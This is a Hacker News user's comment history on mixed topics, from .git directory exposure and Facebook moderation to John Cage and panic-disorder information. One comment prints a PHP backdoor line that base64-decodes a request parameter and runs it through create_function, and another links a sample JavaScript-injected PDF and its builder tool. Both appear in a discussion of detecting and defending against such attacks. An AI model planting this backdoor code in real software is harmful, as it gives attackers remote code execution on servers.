Hacker News: _cereal's comments

So it seems he went farther :D


Or so they know it's still a long way.



Agreed, it is difficult to catch. For the log, in this case there are both functions; the output looks something like this:

  // Attacker-controlled request parameter, base64-decoded into PHP source and compiled into an anonymous function
  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
The `create_function()`[1] will internally execute `eval()` so the result would be the same.

[1] http://php.net/create_function


For "known good" folder, a git repository may help, at least to restore a clean version of the code.


Probably preaching to the choir here, but for those who are unaware, be sure that .git directories are not accessible by web clients. It will lead to source code disclosure, and if you've checked in any secrets, credential exposure as well.


That and if the webserver can write to .git it can also invisibly modify the history to ensure that you continue to check out the backdoored code no matter how far you go back.


I second that.

An example: a few weeks ago I shared on my FB profile the Mozilla Foundation petition link for the EU copyright reform[1] and it was removed with this motivation:

"We removed this post because it looks like spam and doesn't follow our Community Standards."

[1] https://blog.mozilla.org/netpolicy/2018/09/07/eu-copyright-r...


It reminds me of John Cage's 4'33''.

- https://en.wikipedia.org/wiki/4%E2%80%B233%E2%80%B3

- https://youtu.be/JTEFKFiXSx4

An anecdote: when my semiotics professor talked about this composition for the first time, I was recording the lecture, and when colleagues asked for a copy, I sent them only the pauses between the sentences. When art meets sarcasm, it spreads really fast.


Hmm. To me, it seems not. Or at least, it seems to be everyday knowledge derived from direct experience. He does not seem to be a qualified expert. The goal here is to sell the books.


From the website:

> the purchase of the book is totally optional, so please do take the time to look around my site

Also, the book is only 13 pounds, so I don't think they are making a lot of money out of it. Perhaps they use the money to keep the website running?


Yes, I read that sentence before writing, and your argument about the website expenses can be valid. It does not change my main point: when it comes to health, one should seek information from qualified professionals. For example:

1. https://www.anxiety.org/panic-disorder-panic-attacks

2. https://www.mayoclinic.org/diseases-conditions/panic-attacks...

A personal experience can sometimes be illuminating, but it cannot be considered an alternative approach. For this reason, I do not consider it a good source. Just my opinion.


You could be right, but on the other hand many qualified professionals prescribe Zoloft or Xanax and are done with it. A personal account (which in fact many of the comments here on HN are) can be very helpful, if only as a reference when talking to real professionals.


This reminds me of the Scaly-foot gastropod[1] mollusc, which "possesses a trilayered structure comprised of a mineralized iron sulfide–based outer layer (OL) containing greigite..."[2]

[1] https://en.wikipedia.org/wiki/Scaly-foot_gastropod

[2] http://www.pnas.org/content/107/3/987


Hi,

Apart from programming, you could add a remote part-time job; look at the positions available at:

https://appen.com/ or http://www.ai-media.tv/


It depends on the exploit and on the reader. If, for example, the reader supports JavaScript, then it can be attacked, apart from other weaknesses. Chrome on Linux executes JavaScript in PDFs, while Firefox does not.

Here is an example file: https://we.tl/q90gXERGmx

Built with https://github.com/cornerpirate/JS2PDFInjector

